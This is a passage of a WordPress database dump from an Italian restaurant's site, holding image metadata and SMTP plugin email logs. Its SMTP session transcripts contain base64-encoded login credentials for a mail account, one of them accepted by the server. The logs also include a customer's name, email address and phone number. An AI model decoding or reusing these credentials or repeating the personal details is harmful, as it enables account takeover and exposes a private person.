hop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1593016379\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22223,1202,'_wp_attached_file','2020/10/solymar-giugno2020-0182.jpg'),(22224,1202,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0182.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0182-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0182-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1593016398\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22225,1204,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22226,1204,'success',''),(22227,1204,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22228,1204,'to_header','webmaster@baldisserri.com'),(22229,1204,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22230,1204,'original_to','webmaster@baldisserri.com'),(22231,1204,'original_subject','[Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.2'),(22232,1204,'original_message','Howdy! Your site at https://www.ristorantesolymar.it has been updated automatically to WordPress 5.5.2.\n\nNo further action is needed on your part. For more on version 5.5.2, see the About WordPress screen:\nhttps://www.ristorantesolymar.it/wp-admin/about.php\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team\n'),(22233,1204,'original_headers',''),(22234,1204,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 29 Oct 2020 20:35:14 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22235,1205,'solution','Not found, check status column for more info.'),(22236,1205,'success','1'),(22237,1205,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22238,1205,'to_header','webmaster@baldisserri.com'),(22239,1205,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22240,1205,'original_to','webmaster@baldisserri.com'),(22241,1205,'original_subject','[Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.2'),(22242,1205,'original_message','Howdy! Your site at https://www.ristorantesolymar.it has been updated automatically to WordPress 5.5.2.\n\nNo further action is needed on your part. For more on version 5.5.2, see the About WordPress screen:\nhttps://www.ristorantesolymar.it/wp-admin/about.php\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team\n'),(22243,1205,'original_headers',''),(22244,1205,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 29 Oct 2020 20:35:16 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <5fff2f83fd476c17ea70894eabe92418@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.2\r\nDate: Fri, 30 Oct 2020 00:35:16 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Your site at https://www.ristorantesolymar.it has been updated au=\r\ntomatically to WordPress 5.5.2.=0A=0ANo further action is needed on your=\r\n part. For more on version 5.5.2, see the About WordPress screen:=0Ahttp=\r\ns://www.ristorantesolymar.it/wp-admin/about.php=0A=0AIf you experience a=\r\nny issues or need support, the volunteers in the WordPress.org support f=\r\norums may be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0A=\r\nThe WordPress Team=0A\r\n.\r\n250 OK id=1kYINw-0003u6-Fo\r\n'),(22245,1206,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22246,1206,'success',''),(22247,1206,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22248,1206,'to_header','webmaster@baldisserri.com'),(22249,1206,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22250,1206,'original_to','webmaster@baldisserri.com'),(22251,1206,'original_subject','[Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.3'),(22252,1206,'original_message','Howdy! Your site at https://www.ristorantesolymar.it has been updated automatically to WordPress 5.5.3.\n\nNo further action is needed on your part. For more on version 5.5.3, see the About WordPress screen:\nhttps://www.ristorantesolymar.it/wp-admin/about.php\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team\n'),(22253,1206,'original_headers',''),(22254,1206,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 30 Oct 2020 20:23:47 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22255,1207,'solution','Not found, check status column for more info.'),(22256,1207,'success','1'),(22257,1207,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22258,1207,'to_header','webmaster@baldisserri.com'),(22259,1207,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22260,1207,'original_to','webmaster@baldisserri.com'),(22261,1207,'original_subject','[Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.3'),(22262,1207,'original_message','Howdy! Your site at https://www.ristorantesolymar.it has been updated automatically to WordPress 5.5.3.\n\nNo further action is needed on your part. For more on version 5.5.3, see the About WordPress screen:\nhttps://www.ristorantesolymar.it/wp-admin/about.php\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team\n'),(22263,1207,'original_headers',''),(22264,1207,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 30 Oct 2020 20:23:49 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <f65d8809f9d0075c9e14a15caf5ab854@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.3\r\nDate: Sat, 31 Oct 2020 00:23:49 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Your site at https://www.ristorantesolymar.it has been updated au=\r\ntomatically to WordPress 5.5.3.=0A=0ANo further action is needed on your=\r\n part. For more on version 5.5.3, see the About WordPress screen:=0Ahttp=\r\ns://www.ristorantesolymar.it/wp-admin/about.php=0A=0AIf you experience a=\r\nny issues or need support, the volunteers in the WordPress.org support f=\r\norums may be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0A=\r\nThe WordPress Team=0A\r\n.\r\n250 OK id=1kYegP-0003Yc-JS\r\n'),(22265,1208,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22266,1208,'success',''),(22267,1208,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22268,1208,'to_header','webmaster@baldisserri.com'),(22269,1208,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22270,1208,'original_to','webmaster@baldisserri.com'),(22271,1208,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22272,1208,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue version 3.0.9\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22273,1208,'original_headers',''),(22274,1208,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 02 Nov 2020 07:22:50 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22275,1209,'solution','Not found, check status column for more info.'),(22276,1209,'success','1'),(22277,1209,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22278,1209,'to_header','webmaster@baldisserri.com'),(22279,1209,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22280,1209,'original_to','webmaster@baldisserri.com'),(22281,1209,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22282,1209,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue version 3.0.9\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22283,1209,'original_headers',''),(22284,1209,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 02 Nov 2020 07:22:52 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <a785629ebfb2c4088ceaec2eb64cc91c@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Mon, 02 Nov 2020 12:22:52 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- News=\r\nletter, SMTP, Email marketing and Subscribe forms by Sendinblue version=\r\n 3.0.9=0A=0A=0AIf you experience any issues or need support, the volunte=\r\ners in the WordPress.org support forums may be able to help.=0Ahttps://w=\r\nordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kZYrM-0003QH-Np\r\n'),(22285,1210,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22286,1210,'success',''),(22287,1210,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22288,1210,'to_header','webmaster@baldisserri.com'),(22289,1210,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22290,1210,'original_to','webmaster@baldisserri.com'),(22291,1210,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22292,1210,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.2.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22293,1210,'original_headers',''),(22294,1210,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 02 Nov 2020 19:23:21 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22295,1211,'solution','Not found, check status column for more info.'),(22296,1211,'success','1'),(22297,1211,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22298,1211,'to_header','webmaster@baldisserri.com'),(22299,1211,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22300,1211,'original_to','webmaster@baldisserri.com'),(22301,1211,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22302,1211,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.2.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22303,1211,'original_headers',''),(22304,1211,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 02 Nov 2020 19:23:23 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <cd94df68410be4e22d6c29d9808db960@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Tue, 03 Nov 2020 00:23:23 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Yoas=\r\nt SEO version 15.2.1=0A=0A=0AIf you experience any issues or need suppor=\r\nt, the volunteers in the WordPress.org support forums may be able to hel=\r\np.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kZk6d-0004CK-L2\r\n'),(22305,1212,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22306,1212,'success',''),(22307,1212,'from_header','Massimo Montalbani <notifiche@ristorantesolymar.it>'),(22308,1212,'to_header','teosphone@gmail.com'),(22309,1212,'reply_to_header','montalbani73@gmail.com'),(22310,1212,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22311,1212,'original_to','teosphone@gmail.com'),(22312,1212,'original_subject','Da sito Sol Y Mar: \"Richiesta conferma apertura\"'),(22313,1212,'original_message','Da: Massimo Montalbani <montalbani73@gmail.com>\nTelefono: 3290782176\nOggetto: Richiesta conferma apertura\n\nCorpo del messaggio:\nBuonasera, volevo sapere se domani a pranzo siete aperti. Sarò a Rimini con mia moglie e forse riusciamo a passare per il pranzo... Grazie!\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22314,1212,'original_headers','From: Massimo Montalbani <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: montalbani73@gmail.com\n'),(22315,1212,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 03 Nov 2020 10:08:42 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22316,1213,'solution','Not found, check status column for more info.'),(22317,1213,'success','1'),(22318,1213,'from_header','Massimo Montalbani <notifiche@ristorantesolymar.it>'),(22319,1213,'to_header','teosphone@gmail.com'),(22320,1213,'reply_to_header','montalbani73@gmail.com'),(22321,1213,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22322,1213,'original_to','teosphone@gmail.com'),(22323,1213,'original_subject','Da sito Sol Y Mar: \"Richiesta conferma apertura\"'),(22324,1213,'original_message','Da: Massimo Montalbani <montalbani73@gmail.com>\nTelefono: 3290782176\nOggetto: Richiesta conferma apertura\n\nCorpo del messaggio:\nBuonasera, volevo sapere se domani a pranzo siete aperti. Sarò a Rimini con mia moglie e forse riusciamo a passare per il pranzo... Grazie!\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22325,1213,'original_headers','From: Massimo Montalbani <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: montalbani73@gmail.com\n'),(22326,1213,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 03 Nov 2020 10:08:44 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Massimo Montalbani <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: montalbani73@gmail.com\r\nMessage-Id: <e5472df1910bcca8d931ff5bc2880717@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Richiesta conferma apertura\"\r\nDate: Tue, 03 Nov 2020 15:08:44 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Massimo Montalbani <montalbani73@gmail.com>=0ATelefono: 3290782176=\r\n=0AOggetto: Richiesta conferma apertura=0A=0ACorpo del messaggio:=0ABuon=\r\nasera, volevo sapere se domani a 